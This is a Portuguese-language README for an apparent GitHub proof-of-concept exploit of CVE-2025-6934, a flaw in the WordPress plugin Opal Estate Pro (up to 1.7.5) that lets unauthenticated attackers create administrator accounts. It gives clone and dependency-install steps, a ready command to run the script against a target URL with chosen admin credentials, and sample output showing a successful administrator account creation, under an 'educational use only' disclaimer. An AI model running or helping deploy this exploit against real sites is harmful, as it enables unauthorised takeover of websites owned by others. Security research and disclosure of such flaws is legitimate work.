
CVE-2025-6934 é uma vulnerabilidade crítica no plugin WordPress Opal Estate Pro (<= 1.7.5) que permite que atacantes não autenticados criem novas contas de administrador através do processo de registro AJAX inseguro do plugin.
📖 Descrição Este repositório contém um exploit de Prova de Conceito (PoC) para CVE-2025-6934, uma vulnerabilidade crítica no Plugin WordPress: Opal Estate Pro <= 1.7.5, permitindo criação de conta de administrador não autenticada.
⚠️ Aviso: Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa em segurança.
O autor não se responsabiliza por qualquer uso indevido ou danos causados.
readme.txtClone o repositório e instale as dependências:
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Execute o script com seu alvo:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Exemplo de saída:
[✔] Exploit Successful!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator

Gaurav Bhattacharjee (0xgh057r3c0n)
Este projeto é licenciado sob a Licença MIT – veja o arquivo LICENSE para detalhes.